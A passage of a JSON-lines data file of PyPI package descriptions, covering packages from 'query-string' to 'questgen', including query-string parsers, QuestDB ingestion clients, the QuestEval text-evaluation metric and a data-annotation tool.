IN\nNO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\nOTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE\nUSE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "query-string", "pacakge-description": "Installation$[sudo]pipinstallquery-stringFeaturesPython 2/3 compatibleExamples>>>importquery_string>>>query_string.parse('https://site.org/index.php?k=v&k2=v2&k3=v3#anchor'){'k':'v','k2':'v2','k3':'v3'}>>>query_string.parse('k=v&k2=v2&k3=v3'){'k':'v','k2':'v2','k3':'v3'}LinksQuery string - Wikipediareadme42.com"} +{"package": "querystringer", "pacakge-description": "QueryStringerSimple middleware for django to extract string queries from urlsInstallationpip install querystringerImportimport it inside middleware in django settingsmiddlewares = [\n ...,\n 'querystringer.middleware.QueryStringer',\n ...,\n]Usageall requests will have an edited request dict\nand you can access them byrequest.GET['queries']Exampleour viewdef home(request):\n return HttpResponse(request.GET['queries'])then send request to/home?test=truenow we should except output like this('test', 'true')Remove specific charactersin yoursettings.pyadd a list withQUERY_REMOVE_STRINGSname\nto ignore characters you want\nlike thisQUERY_REMOVE_STRINGS = ['-', '>', '%']then the data you get will be clean\nlike this\nrequest to/home?test=tru>ethen we get(test, true)"} +{"package": "querystring-parser", "pacakge-description": "No description available on PyPI."} +{"package": "querystringsafe-base64", "pacakge-description": "Query string safe Base64Encoding and decoding arbitrary strings into strings that are safe to put into a URL query param.The problemurlsafe_b64encodeandurlsafe_b64decodefrom base64 are not enough because they leave=used for padding chars unquoted:importbase64base64.urlsafe_b64encode('a')'YQ=='And there are 2 problems with that=sign gets quoted:importurlliburllib.quote('=')'%3D'Some libraries tolerate the=in query string values:fromurlparseimporturlsplit,parse_qsparse_qs(urlsplit('http://aaa.com/asa?q=AAAA=BBBB=CCCC').query){'q':['AAAA=BBBB=CCCC']}but the RFC 3986 underspecifies the query string so we cannot rely on=chars being handled by all web applications as it is done by urlparse.Therefore we consider chars:[\u2018+\u2019, \u2018/\u2019, \u2018=\u2019]unsafe and we replace them with[\u2018-\u2019, \u2018_\u2019, \u2018.\u2019].\nCharacters+and/are already handled byurlsafe_*functions from base64 so only=is left.\nSince the=is used exclusively for padding, we simply remove it, and re-attach the padding during decoding.\nBecause of that,querystringsafe_base64is able to decode padded and unpadded string.The solutionimportquerystringsafe_base64querystringsafe_base64.encode(b'foo-bar')b'Zm9vLWJhcg'querystringsafe_base64.decode(b'Zm9vLWJhcg..')b'foo-bar'querystringsafe_base64.decode(b'Zm9vLWJhcg')b'foo-bar'CHANGELOG1.2.0Remove padding characters from encoded string.1.1.1Fixed packaging1.1.0Always expect bytesAdd type annotations1.0.0support for restore missing padding during decode process0.2.0Support for python30.1.5Move querystringsafe_base64 module to the rootUse install instead of develop during tests0.1.4Remove bdist_wheel from distributons0.1.3Install pandoc (travis)0.1.2Add setup.cfg and pypandoc to tests0.1.1add MANIFEST.in file0.1.0package structuretests"} +{"package": "query-strings-parser", "pacakge-description": "No description available on PyPI."} +{"package": "querystruct", 
"pacakge-description": "No description available on PyPI."} +{"package": "queryswap", "pacakge-description": "qsAccepts urls from a filename and, for each query parameter, replace the value\nwith a specified value.UsageExample input file:~ % cat urls.txt\nhttps://www.evildojo.com/index.php?q=search&name=darkmage\nhttps://www.evildojo.com/index.php?q=search\nhttps://www.evildojo.com/index.php\nhttps://www.evildojo.comExample usage:python3 -m qs urls.txt d3v\nhttps://www.evildojo.com/index.php?q=d3v\nhttps://www.evildojo.com/index.php?q=d3v&name=darkmage\nhttps://www.evildojo.com/index.php?q=search&name=d3v"} +{"package": "querytograph", "pacakge-description": "QueryToGraphQueryToGraph is a Python library that allows user to use simple English to create graph from a dataframe or csv file. It uses ChatGPT as the underlying engine.For security's sake, it does not send the raw data to ChatGPTbut only the data schema (i.e. the data field names) is sent.InstallationYou can install QueryToGraph using pip:pipinstallquerytographSorry I have only tested this library in Linux.UsageYou need to have an paid OpenAI account and you need to set your OpenAI API Key in your environment variable. You can set it in the terminal:exportOPENAI_API_KEY=\"put your key here, don't copy this line as it is!\"Alternatively, you could do this from inside your Jupyter notebook or Python script:import\nos.environ[\"OPENAI_API_KEY\"=\"put your key here, don't copy this line as it is!\"To use QueryToGraph, in your Jupyter notebook or Python script:importquerytographqtg=querytograph.QueryToGraph()qtg.run_gr()Go to your browser and use it, e.g.http://127.0.0.1:7861There are 3 textboxes which you have to key inQueryQuestion by the user, which will be used to generate the graph\nExample: \"show me the highest and lowest closing price for each month\"Data FolderFolder which contains Pandas dataframes in csv or pkl (pickle)Table NameFilename of the dataframe that the user wants to query on.\nDo not require the exact nameContributingContributions are welcome! Please contact me atfranziss@gmail.comThis was hack over a weekend and I am sure there are bounds to have bugs... sorry.. =)LicenseThis project is licensed under the MIT License - see the LICENSE file for details.Contactfranziss@gmail.com"} +{"package": "query-toolkits", "pacakge-description": "No description available on PyPI."} +{"package": "querytools", "pacakge-description": "DatatoolsQuerying databases for humans. 
And databases."} +{"package": "querytree", "pacakge-description": "QueryTreeQueryTree is a python data structure that lets you quickly access deeply nested data and load/save it in any major format.With QueryTree, you don't have to check for the esistance of (or create) any intermediate nodes.json_str=\"\"\"{\"foo\": {\"bar\": [{\"baz\": {\"n\": 1}},{\"baz\": {\"n\": 1},\"buz\": {\"k\": 2}}]}}\"\"\"tree=Tree.parse_json(json_str)print(tree['foo.bar.0.baz.n'])# 1print(tree['foo.bar.1.buz.k'])# 2# accessing nonexistant locations isn't a problemprint(tree['foo.bar.0.buz.k'])# Noneprint(tree['something.else'])# None# assign valuestree['foo.bar.0.baz.n']=99tree['foo.foo']={\"myvalue\":\"a value\"}# save as any formatprint(tree.to_yaml())Outputs:foo:bar:-baz:n:99-baz:n:1buz:k:2foo:myvalue:a value"} +{"package": "querytyper", "pacakge-description": "QuerytyperQuerytyper is a Python package to query MongoDB using a fully typed syntax.\nIt leverages the Pydantic library for defining and validating data models, providing a seamless and type-safe experience.FeaturesConstruct MongoDB queries using Python's native syntax with type hints.Leverage Pydantic models to define your MongoDB document structure and query filters efficiently.Build complex queries using logical operators and comparisons in a natural and expressive way.UsingTo add and install this package as a dependency of your project, runpoetry add querytyper.A simple example:frompydanticimportBaseModel,EmailStrfromquerytyperimportMongoFilterMeta,MongoQueryclassUser(BaseModel):\"\"\"User database model.\"\"\"id:intname:strage:intemail:EmailStrclassUserFilter(User,metaclass=MongoFilterMeta):\"\"\"User query filter.\"\"\"query=MongoQuery((UserFilter.name==\"John\")&(UserFilter.age>=10)&(UserFilter.emailin[\"john@example.com\",\"john@gmail.com\",]))print(query){\"name\":\"John\",\"age\":{\"$gte\":10},\"email\":[\"john@example.com\",\"john@gmail.com\",],}ContributingPrerequisites1. Set up Git to use SSHGenerate an SSH keyandadd the SSH key to your GitHub account.Configure SSH to automatically load your SSH keys:cat<< EOF >> ~/.ssh/configHost *AddKeysToAgent yesIgnoreUnknown UseKeychainUseKeychain yesEOF2. Install DockerInstall Docker Desktop.EnableUse Docker Compose V2in Docker Desktop's preferences window.Linux only:Export your user's user id and group id so thatfiles created in the Dev Container are owned by your user:cat<< EOF >> ~/.bashrcexport UID=$(id --user)export GID=$(id --group)EOF3. Install VS Code or PyCharmInstall VS CodeandVS Code's Dev Containers extension. 
Alternatively, installPyCharm.Optional:install aNerd Fontsuch asFiraCode Nerd Fontandconfigure VS Codeorconfigure PyCharmto use it.Development environmentsThe following development environments are supported:\u2b50\ufe0fGitHub Codespaces: click onCodeand selectCreate codespaceto start a Dev Container withGitHub Codespaces.\u2b50\ufe0fDev Container (with container volume): click onOpen in Dev Containersto clone this repository in a container volume and create a Dev Container with VS Code.Dev Container: clone this repository, open it with VS Code, and runCtrl/\u2318+\u21e7+P\u2192Dev Containers: Reopen in Container.PyCharm: clone this repository, open it with PyCharm, andconfigure Docker Compose as a remote interpreterwith thedevservice.Terminal: clone this repository, open it with your terminal, and rundocker compose up --detach devto start a Dev Container in the background, and then rundocker compose exec dev zshto open a shell prompt in the Dev Container.DevelopingThis project follows theConventional Commitsstandard to automateSemantic VersioningandKeep A ChangelogwithCommitizen.Runpoefrom within the development environment to print a list ofPoe the Poettasks available to run on this project.Runpoetry add {package}from within the development environment to install a run time dependency and add it topyproject.tomlandpoetry.lock. Add--group testor--group devto install a CI or development dependency, respectively.Runpoetry updatefrom within the development environment to upgrade all dependencies to the latest versions allowed bypyproject.toml.Runcz bumpto bump the package's version, update theCHANGELOG.md, and create a git tag."} +{"package": "query-understanding", "pacakge-description": "No description available on PyPI."} +{"package": "queryverse", "pacakge-description": "Queryverse LibraryQueryverse is a very lightweight prompting Python libraryInstallationYou can install queryverse using pip:pip install queryverseBuild Tooltool name:PDMminimum version: python 3.9"} +{"package": "query-wizard-features-reader", "pacakge-description": "This is a security placeholder package.\nIf you want to claim this name for legitimate purposes,\nplease contact us atsecurity@yandex-team.ruorpypi-security@yandex-team.ru"} +{"package": "query-write", "pacakge-description": "No description available on PyPI."} +{"package": "queryzpythonfirsttestlol", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quesadiya", "pacakge-description": "Quesadiya is a data annotation project management platform where you can manage a\nproject through a Command Line Interface (CLI) and annotate data on a Web GUI to generate a triplet data set for developing Siamese models.QuickstartInstallationYou can install quesadiya by running$ pip install quesadiyaCheck the installation by running$ quesadiyaInstallation from Sourcegit clone this repo.cd quesadiya.run pip install ..check the installation by running quesadiya on your terminal.Project ManagementQuesadiya provides the command-line interface (CLI) to manage data annotation projects.
Each row follows the format below:{\"anchor_sample_id\":\"text\",\"positive_sample_id\":\"text\",\"negative_sample_id\":\"text\"}Note that this operation requires the admin privilege.The operation above only generates a triplet data set with samples ids.\nIf you\u2019d like to include text for each sample, add-ioption. For example,$quesadiyaexportquesodata.jsonl-iThis will generate a jsonline file, where each row follows:{\"anchor_sample_id\":\"text\",\"positive_sample_id\":\"text\",\"negative_sample_id\":\"text\",\"anchor_sample_text\":\"list of text\"// each element is a paragraph,\"positive_sample_text\":\"list of text\",\"negative_sample_text\":\"list of text\"}SecurityA disclaimer: Quesadiya and its contributors take no responsibility for protecting your data.That said, we encrypt all passwords usingargon2.If you\u2019d like to prohibit any other user on your environment from accessing your data, we encourage you to change the accessibility of\nproject folder. You can see the path to the quesadiya root by$quesadiyapathThis command shows the absolute path to quesadiya project folder.\nGo to the directory, and you\u2019ll find your project folder."} +{"package": "quesans", "pacakge-description": "QuestionAnswering : Qur'an Question Answering with TransformersTransformers based approach for question answering in Qur'an which employs transfer-learning, ensemble-learning across multiple models.InstallationYou first need to install Java for the evaluation script which usesfarasapyand the desired version is Java8.\nPlease referOracle installation guidefor more details on installing JDK for different platforms.Then you need to install PyTorch. The recommended PyTorch version is 1.11.0\nPlease refer toPyTorch installation pagefor more details specifically for the platforms.When PyTorch has been installed, you can install requirements from source by cloning the repository and running:gitclonehttps://github.com/DamithDR/QuestionAnswering.gitcdQuestionAnswering\npipinstall-rrequirements.txtExperiment ResultsYou can easily run experiments using following command and altering the parameters as you wishpython-mexamples.arabic.quran.quran_question_answering--n_fold=1--transfer_learning=False--self_ensemble=False--models=camelmix,arabertParametersPlease find the detailed descriptions of the parametersn_fold : Number of executions expected before self ensemble\ntransfer_learning : On/Off transfer learning\nself_ensemble : On/Off self ensembling\nmodels : comma seperated model tagsModel Tagsarabert : aubmindlab/bert-base-arabertv2\nmbertcased : bert-base-multilingual-cased\nmbertuncased : bert-base-multilingual-uncased\ncamelmix : CAMeL-Lab/bert-base-arabic-camelbert-mix\ncamelca : CAMeL-Lab/bert-base-arabic-camelbert-ca\naraelectradisc : aubmindlab/araelectra-base-discriminator\naraelectragen : aubmindlab/araelectra-base-generator"} +{"package": "quese", "pacakge-description": "QUESE\"Quese\" allows you implement in an easy way a Search Algoritm, based on Embeddings and Semantic Similarity, in your Python apps.\nThe module provides a function called search_by_embeddings(), with several params to customize the searching process.INSTALLATIONYou can install \"quese\" with pip:pipinstallqueseEXAMPLE WITH BYfrom quese import search_by_embeddings\n\ndata_ = [\n {\n \"title\": \"UX Designer\",\n \"tags\": \"Designer\"\n },\n {\n \"title\": \"Senior Accounter\",\n \"tags\": \"Accounter\" \n },\n {\n \"title\": \"Product Manager\",\n \"tags\": \"Managment\" \n }\n]\n\nresults = search_by_embeddings(data=data_, 
query=\"Manager\", by=\"title\")\n#Results will return a LIST with the dictionaries whose title is Semantically Similar to the query: \"Manager\", so in this case, the last dictionary: \"Product Manager\".\nprint(results)PARAMSdata:It's the first param, it'sREQUIRED, and it must be alist of dictionaries.query:It's the second param, it'sREQUIREDas well, and it represent the query you want to pass.Type:stringby:It's the third param, it'sonly REQUIRED if you don't pass the \"template\" param, and it represent the value of your dictionaries that you are searching for.For example, if you want to search in a list of products, your \"by\" param could be the prop \"name\" of each product.Type:stringtemplate:It'sonly REQUIRED if you don't pass the \"by\" param, and it's similar to \"by\", but allow you to search by a customized string for each dictionary in your data list.For example, if you want to search in a list of products, your \"template\" param could be a string like this: \"{name}, seller: {seller}\".\nNotice that you have to define your propsbetween \"{}\", as you can see in the example with the variables\"name\"and\"seller\".Type:stringaccuracy:It'soptional, and it represents the similarity that the dictionary must have with the query to be considered a result.The default value is 0.4, wich works good with almost all the models. However, if you want to change it, we don't recommend to set vary high values or very low values, the range0.3-0.6should be enought.Type:float number between 0-1model:It'soptional, and it represents theembedding modelyou want to use.The default model is'sentence-transformers/all-MiniLM-L6-v2'. You can use an other model like 'sentence-transformers/all-mpnet-base-v2', but take care becauseif the model don't work with sentence-transformers this package will not work with it.Type:stringEXAMPLE WITH TEMPLATEfrom quese import search_by_embeddings\n\ndata_ = [\n {\n \"title\": \"UX Designer\",\n \"tags\": \"Designer\"\n },\n {\n \"title\": \"Senior Accounter\",\n \"tags\": \"Accounter\" \n },\n {\n \"title\": \"Product Manager\",\n \"tags\": \"Managment\" \n }\n]\n\nresults = search_by_embeddings(data=data_, query=\"Manager\", template=\"{title}, {tags}\")\n#Results will return a LIST with the dictionaries whose title and tags are Semantically Similar to the query: \"Manager\", so in this case, the last dictionary: \"Product Manager\".\nprint(results)"} +{"package": "queso", "pacakge-description": "DEPRECATEDQueso is no longer maintained. 
Please useBocadillo CLIinstead."} +{"package": "questdb", "pacakge-description": "This library makes it easy to insert data intoQuestDB.This client library implements QuestDB\u2019s variant of theInfluxDB Line Protocol(ILP) over TCP.ILP provides the fastest way to insert data into QuestDB.This implementation supportsauthenticationand full-connection\nencryption with TLS.QuickstartThe latest version of the library is 1.2.0.python3 -m pip install questdbfromquestdb.ingressimportSender,TimestampNanoswithSender('localhost',9009)assender:sender.row('sensors',symbols={'id':'toronto1'},columns={'temperature':20.0,'humidity':0.5},at=TimestampNanos.now())sender.flush()You can also send Pandas dataframes:importpandasaspdfromquestdb.ingressimportSenderdf=pd.DataFrame({'id':pd.Categorical(['toronto1','paris3']),'temperature':[20.0,21.0],'humidity':[0.5,0.6],'timestamp':pd.to_datetime(['2021-01-01','2021-01-02'])})withSender('localhost',9009)assender:sender.dataframe(df,table_name='sensors',at='timestamp')Docshttps://py-questdb-client.readthedocs.io/Codehttps://github.com/questdb/py-questdb-clientPackage on PyPIhttps://pypi.org/project/questdb/CommunityIf you need help, have additional questions or want to provide feedback, you\nmay find us onSlack.You can alsosign up to our mailing listto get notified of new releases.LicenseThe code is released under theApache License 2.0."} +{"package": "questdb-connect", "pacakge-description": "QuestDB ConnectThis repository contains the official implementation of QuestDB's dialect forSQLAlchemy,\nas well as an engine specification forApache Superset, usingpsycopg2for database connectivity.The Python module is available here:https://pypi.org/project/questdb-connect/Psycopg2is a widely used and trusted Python module for connecting to, and working with, QuestDB and other\nPostgreSQL databases.SQLAlchemyis a SQL toolkit and ORM library for Python. It provides a high-level API for communicating with\nrelational databases, including schema creation and modification. The ORM layer abstracts away the complexities\nof the database, allowing developers to work with Python objects instead of raw SQL statements.Apache Supersetis an open-source business intelligence web application that enables users to visualize and\nexplore data through customizable dashboards and reports. 
It provides a rich set of data visualizations, including\ncharts, tables, and maps.RequirementsPython from 3.9 to 3.11(superset itself use version3.9.x)Psycopg2('psycopg2-binary~=2.9.6')SQLAlchemy('SQLAlchemy<=1.4.47')You need to install these packages because questdb-connect depends on them.Versions 0.0.XThese are versions released for testing purposes.InstallationYou can install this package using pip:pipinstallquestdb-connectSQLALchemy Sample UsageUse the QuestDB dialect by specifying it in your SQLAlchemy connection string:questdb://admin:quest@localhost:8812/main\nquestdb://admin:quest@host.docker.internal:8812/mainFrom that point on use standard SQLAlchemy:importdatetimeimportosos.environ.setdefault('SQLALCHEMY_SILENCE_UBER_WARNING','1')importquestdb_connect.dialectasqdbcfromsqlalchemyimportColumn,MetaData,create_engine,insertfromsqlalchemy.ormimportdeclarative_baseBase=declarative_base(metadata=MetaData())classSignal(Base):__tablename__='signal'__table_args__=(qdbc.QDBTableEngine('signal','ts',qdbc.PartitionBy.HOUR,is_wal=True),)source=Column(qdbc.Symbol)value=Column(qdbc.Double)ts=Column(qdbc.Timestamp,primary_key=True)defmain():engine=create_engine('questdb://localhost:8812/main')try:Base.metadata.create_all(engine)withengine.connect()asconn:conn.execute(insert(Signal).values(source='coconut',value=16.88993244,ts=datetime.datetime.utcnow()))finally:ifengine:engine.dispose()if__name__=='__main__':main()Superset InstallationFollow the instructions availablehere.ContributingThis package is open-source, contributions are welcome. If you find a bug or would like to request a feature,\nplease open an issue on the GitHub repository. Have a look at the instructions fordevelopersif you would like to push a PR."} +{"package": "questdb-ilp-client", "pacakge-description": "Python QuestDB ILP TCP clientRequirementsThis repository contains a Python 3.9 API for ingesting data into QuestDB through the InfluxDB Line Protocol.We usemakeas a CLI to various convenient work developer flows.Install FlowWe requirePython 3.9.*, or aboveinstalled in your system, andpipneeds to be up-to-date:$python3--version\n$Python3.9.\n$pip3install--upgradepipNow we can install the project's dependencies in a virtual environment and activate it:$makeinstall-dependenciesOr for development (Required for code quality and test flows):$makeinstall-dependencies-devTo activate the environment:$poetryshell\n$echo$SHLVL2To deactivate the environment:$exit$echo$SHLVL1Code Quality Flow (Requires dev dependencies)For convenience, we can let standard tools apply standard code formatting; the second command will report\nissues that need to be addressed before using the client in production environments.$makeformat-code\n$makecheck-code-qualityTest Flow (Requires dev dependencies)To run all tests in thetestsmodule:$maketestStart/stop QuestDB Docker container FlowTo start QuestDB:$makecompose-upThis creates a folderquestdb_rootto store QuestDB's table data/metadata, server configuration files,\nand the web UI.The Web UI is avaliable at:localhost:9000.Logs can be followed on the terminal:$dockerlogs-fquestdbTo stop QuestDB:$makecompose-downData is available, even when QuestDB is down, in folderquestdb_root.Basic usagewithLineTcpSender(HOST,PORT,SIZE)asls:ls.table(\"metric_name\")ls.symbol(\"Symbol\",\"value\")ls.column_int(\"number\",10)ls.column_float(\"double\",12.23)ls.column_str(\"string\",\"born to shine\")ls.at_utc_datetime(datetime(2021,11,25,0,46,26))ls.flush()As an 
objectls=LineTcpSender(HOST,PORT,SIZE)ls.table(\"metric_name\")ls.symbol(\"Symbol\",\"value\")ls.column_int(\"number\",10)ls.column_float(\"double\",12.23)ls.column_str(\"string\",\"born to shine\")ls.at_utc_datetime(datetime(2021,11,25,0,46,26))ls.flush()Multi-line sendwithLineTcpSender(HOST,PORT,SIZE)asls:foriinrange(int(1e6)):ls.table(\"metric_name\")ls.column_int(\"counter\",i)ls.at_now()ls.flush()Object multi-line sendls=LineTcpSender(HOST,PORT,SIZE)foriinrange(int(1e6)):ls.table(\"metric_name\")ls.column_int(\"counter\",i)ls.at_now()ls.flush()NotesOn filesetup.py: It is deprecated. To publish a package on PyPi you\ncanfollow this."} +{"package": "quest-eras", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "questeval", "pacakge-description": "QuestEvalQuestEval is aNLG metricto assess if two different inputs contain the same information. The metric, based on Question Generation and Answering can deal withmultimodalandmultilingualinputs.\nIt is the result from an (on-going) international collaboration, and so far it tackles various tasks:SummarizationText SimplificationData2textImage CaptioningMultilingual EvaluationPlanned extensions:Multilingual Evaluation1/ Installing QuestEval$ conda create --name questeval python=3.9\n$ conda activate questevalWARNING: You need to install, before any package, correct version ofpytorchlinked to your cuda version.(questeval) $ conda install pytorch cudatoolkit=10.1 -c pytorch(questeval) $ conda install pip\n(questeval) $ pip install -e .2/ Using QuestEvalThe defaulttaskistext2textand the defaultlanguageisen. It allows to measure the content similarity between any two English texts. This means thatQuestEval can be used to evaluate any NLG task where references are available. Alternatively, we can compare the hyothesis to the source as detailed below.For tasks specificities, see below.Here is an example. Note that the code can take time since it requires generating and answering a set of questions. However, if you let the parameteruse_cacheto its default value atTrue, running the same example again will be very fast this time.from questeval.questeval_metric import QuestEval\nquesteval = QuestEval(no_cuda=True)\n\nsource_1 = \"Since 2000, the recipient of the Kate Greenaway medal has also been presented with the Colin Mears award to the value of 35000.\"\nprediction_1 = \"Since 2000, the winner of the Kate Greenaway medal has also been given to the Colin Mears award of the Kate Greenaway medal.\"\nreferences_1 = [\n \"Since 2000, the recipient of the Kate Greenaway Medal will also receive the Colin Mears Awad which worth 5000 pounds\",\n \"Since 2000, the recipient of the Kate Greenaway Medal has also been given the Colin Mears Award.\"\n]\n\nsource_2 = \"He is also a member of another Jungiery boyband 183 Club.\"\nprediction_2 = \"He also has another Jungiery Boyband 183 club.\"\nreferences_2 = [\n \"He's also a member of another Jungiery boyband, 183 Club.\", \n \"He belonged to the Jungiery boyband 183 Club.\"\n]\n\nscore = questeval.corpus_questeval(\n hypothesis=[prediction_1, prediction_2], \n sources=[source_1, source_2],\n list_references=[references_1, references_2]\n)\n\nprint(score)Output:{'corpus_score': 0.6115364039438322, \n'ex_level_scores': [0.5698804143875364, 0.6531923935001279]}In the output, you have access to thecorpus_scorewhich corresponds to the average of each example score stored inex_level_scores. 
Note that the score is always between 0 and 1.Reference-less modeYes, QuestEval can score a text without any references:score = questeval.corpus_questeval(\n hypothesis=[prediction_1, prediction_2], \n sources=[source_1, source_2]\n)\n\nprint(score)Output:{'corpus_score': 0.5538727587335324, \n'ex_level_scores': [0.5382940950847808, 0.569451422382284]}LogsYou can have access to the logs containing all the information about the generated questions or the question answering outputs:log = questeval.open_log_from_text(source_1)For instance, to print the questions asked onsource_1:print(log['asked'].keys())Output:dict_keys(['Since 2000, the winner of the Kate Greenaway medal has also been given to the Colin Me', 'What medal has been given to the winner of the Colin Mears award?', 'What has been given to the Colin Mears award since 2000?', 'What has been given to the winner of the Colin Mears award since 2000?', 'What has been given to the winner of the Kate Greenaway medal since 2000?'])HashFor reproducibility purpose, we defined a hash that contains exhaustive information such as the QuestEval version, as well as the used models names and the scores types:questeval.__hash__()Output:\"QuestEval_version=0.2.4_task=text2text_lang=en_preproc=None_consist=False_scores=('answerability', 'bertscore', 'f1')W_hash=None_hyp_QA_hash=ThomasNLG/t5-qa_squad2neg-en_ref_QA_hash=ThomasNLG/t5-qa_squad2neg-en_src_QA_hash=ThomasNLG/t5-qa_squad2neg-en_hyp_QG_hash=ThomasNLG/t5-qg_squad1-en_ref_QG_hash=ThomasNLG/t5-qg_squad1-en_src_QG_hash=ThomasNLG/t5-qg_squad1-en\"Using your own modelsThe pre-trained QA/QG models will be automatically downloaded from Hugging Face. Alternatively, you can use your own models and change them dynamically with thequesteval.set_model(model_name)method that takes as input apathor a Hugging Facemodel_name. If themodel_nameis hosted on the Hugging Face hub, it will be downloaded automatically.\nYou can also use any of your beloved models, the only required method to implement is themodel.predict().3/ Tasks specificitiesSummarizationDescription:The project is a collaboration work betweenLIP6 Lab,New York UniversityandReciTAL Research.QuestEval also handles summarization specificities: we developed a Weighter that selects only the questions asking about the important facts that are worth to be summarized. Read more in the originalpaper. To activate this Weighterdo_weighter=Truewhen loading the metric. This parameter will be activated by default ifquesteval.task=summarization.Warning:the code has changed from the paper and Weigther input format is no longer correct. We plan to provide a new Weighter soon. 
However, in the meantime, if you plan to use it, we recommend to use the previousversion.Paper:QuestEval: Summarization Asks for Fact-based EvaluationHow to cite:@article{scialom2020QuestEval,\n title={QuestEval: Summarization Asks for Fact-based Evaluation},\n author={Scialom, Thomas and Dray, Paul-Alexis and Gallinari Patrick and Lamprier Sylvain and Piwowarski Benjamin and Staiano Jacopo and Wang Alex},\n journal={arXiv preprint arXiv:2103.12693},\n year={2021}\n}Text SimplificationDescription:For Text Simplification, we recommend to use the default setup with thetext2texttask.QuestEval has been shown to perform better than BLEU, BERTScore or SARI metrics as reported in the paper.Paper:Rethinking Automatic Evaluation in Sentence SimplificationHow to cite:@article{scialom2021rethinking,\n title={Rethinking Automatic Evaluation in Sentence Simplification},\n author={Scialom, Thomas and Martin, Louis and Staiano, Jacopo and de la Clergerie, {\\'E}ric Villemonte and Sagot, Beno{\\^\\i}t},\n journal={arXiv preprint arXiv:2104.07560},\n year={2021}\n}Data2textDescription:Trained data-QA/QG models that deals with input tables (e.g. E2E or Webnlg), are available by default. To load QuestEval fordata2texttasks, specifyquesteval.task=data2text.Note that you need a specific preprocessing to linearize the tables. By default we handle theGEMformat. If you need an other preprocessing for your format, you can pass a custom function to Questeval:src_preproc_pipe=custom_formating. Importantly, the linearised input format needs to be consistent with respect to our own format.Paper:Data-QuestEval: A Referenceless Metric for Data to Text Semantic EvaluationHow to cite:@article{rebuffel2021data,\n title={Data-QuestEval: A Referenceless Metric for Data to Text Semantic Evaluation},\n author={Rebuffel, Cl{\\'e}ment and Scialom, Thomas and Soulier, Laure and Piwowarski, Benjamin and Lamprier, Sylvain and Staiano, Jacopo and Scoutheeten, Geoffrey and Gallinari, Patrick},\n journal={arXiv preprint arXiv:2104.07555},\n year={2021}\n}Image Captioning[Coming Soon]Multilingual Evaluation[Coming Soon]"} +{"package": "questgame", "pacakge-description": "No description available on PyPI."} +{"package": "questgen", "pacakge-description": "\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 (\u043a\u0432\u0435\u0441\u0442\u043e\u0432). 
\u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044e \u043c\u0438\u0440\u0430 (\u0432 \u0432\u0438\u0434\u0435 \u043d\u0430\u0431\u043e\u0440\u0430 \u043f\u0440\u0435\u0434\u0438\u043a\u0430\u0442\u043e\u0432) \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u043b\u0438\u043d\u0435\u0439\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0441 \u0441\u043e\u0431\u044b\u0442\u0438\u044f\u043c\u0438 \u0438 \u0440\u0430\u0437\u043d\u043e\u0433\u043e \u0440\u043e\u0434\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f\u043c\u0438 (\u0432\u0440\u043e\u0434\u0435 \u00ab\u0438\u0441\u0445\u043e\u0434 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u0436\u0430 \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u00bb).\u0422\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c, \u043f\u0440\u0438\u043c\u0435\u0440 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438:svg\u041a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440\u044b \u0432\u0441\u0435\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439:./questgen/quests/\u0421\u043e\u0437\u0434\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 MMOZPG \u0438\u0433\u0440\u0435\u0421\u043a\u0430\u0437\u043a\u0430.\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u0441\u0435\u0445 \u00ab\u0431\u0430\u0437\u043e\u0432\u044b\u0445\u00bb \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u043b\u0435\u0436\u0430\u0442 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435./questgen/svgs/\u0420\u0430\u0431\u043e\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u043d\u0430habrahabr.\u0423\u0441\u043b\u043e\u0432\u043d\u044b\u0435 